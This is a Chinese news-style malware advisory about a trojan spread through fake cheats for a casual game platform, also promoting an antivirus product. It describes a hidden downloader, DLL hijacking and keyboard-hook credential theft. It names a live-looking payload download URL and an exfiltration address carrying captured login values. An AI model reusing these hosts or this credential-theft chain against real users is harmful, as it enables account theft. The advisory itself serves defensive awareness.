大同市民张志春一直喜欢万456游戏大厅中的休闲游戏，不过最近发生的一件事情令他无比郁闷，他的456游戏账号被盗了，前几天充值的100元钱被木马盗走了。令他想不通的是，木马不是盯着热门游戏吗，为什么连休闲游戏也不放过？的确，热门游戏油水更足，不过竞争者也多，想咬一口都得费九牛二虎之力。对饿极了的木马来说，改行吃素选择休闲游戏也是一种生存之道，于是456游戏木马诞生了。

档案夹

病毒名称：456游戏木马

病毒危害：盗窃游戏账号余额

病毒级别：近一个月感染数十万台电脑

查杀推荐：电脑管家、金山毒霸

大同市民张志春一直喜欢万456游戏大厅中的休闲游戏，不过最近发生的一件事情令他无比郁闷，他的456游戏账号被盗了，前几天充值的100元钱被木马盗走了。令他想不通的是，木马不是盯着热门游戏吗，为什么连休闲游戏也不放过？的确，热门游戏油水更足，不过竞争者也多，想咬一口都得费九牛二虎之力。对饿极了的木马来说，改行吃素选择休闲游戏也是一种生存之道，于是456游戏木马诞生了。

揭秘456游戏木马的罪行

再拉一个“祸害”来

该木马主要通过虚假的456游戏外挂传播，一旦用户下载并运行了捆绑了木马的456游戏外挂，它就会在系统盘创建一个文件夹 （C：WINDOWSaddins），释放一个下载程序lsass.exe并设置其属性为隐藏，然后通过该程序下载盗号木马（ （http://www.lkly520.com/niuniux.exe）。嘿嘿，自己作恶就不说了，还拉帮结派的来作恶，企图盗窃用户的其他账号密码，例如网银、QQ等账号和密码。可恶！

456游戏木马下载其他盗号木马

为绑架游戏而窜改文件

接着，该木马通过注册表搜索456游戏大厅的安装目录，向目录释放一个隐藏属性且被劫持的SkinModuleCHS.dll，当456游戏大厅被运行时，SkinModuleCHS.dll就会被游戏加载，然后生成盗号主体文件skinodu.dll。说白了，就是窜改了456游戏文件，从而将刀架在了脖子上。

456游戏木马劫持了游戏的DLL

粗暴手段打劫账号

最后就是利用钩子强行截取456游戏的账号和密码，然后通过IE发送到黑客指定的收信地址，例如收信地址 http://61.188.38.94:66/post.asp？id1=5617192&d10=willJ1234& d11=1qaz2wsx3edc&d22=&d80=&d31=& mc=06000000000C294B4F88CD0C& hdif=38CAFB8F5C79CF733DDE822911F80A6FF9916124FA77A72C2965911A5940D28EB0E6AAF50203940CB0E6AAF50203940CE33AC6E6836E81FA013224B85112C621CAEC077AC72C2934¶=2012064。

通过钩子截取456游戏的账号和密码

剿杀456游戏木马

腾讯电脑管家是第一个发现456游戏木马的安全厂商，并对其进行了长时间的跟踪和分析，积累了丰富的查杀经验。目前，腾讯电脑管家不用升级就可以查杀该木马的母体以及子体，也会阻止该木马的运行。

　　推荐阅读

　　iPhone 5通过国家3C认证 内地上市有望提速

9月26日消息，搜狐IT日前发现苹果iPhone5已经通过我国的3C（ChinaCompulsoryCertification）认证，证书编号为2012011606570253，发证日期为9月24日，有效期为5年。 iPhone 5型号介绍，入网很可能是1429不同版本 iPho>>>详细阅读

本文标题：大同游戏玩家爆料：饿极了木马也吃“素”

地址：http://www.lgo100.com/a/xie/20120201/115139.html

 1/2    1  2 下一页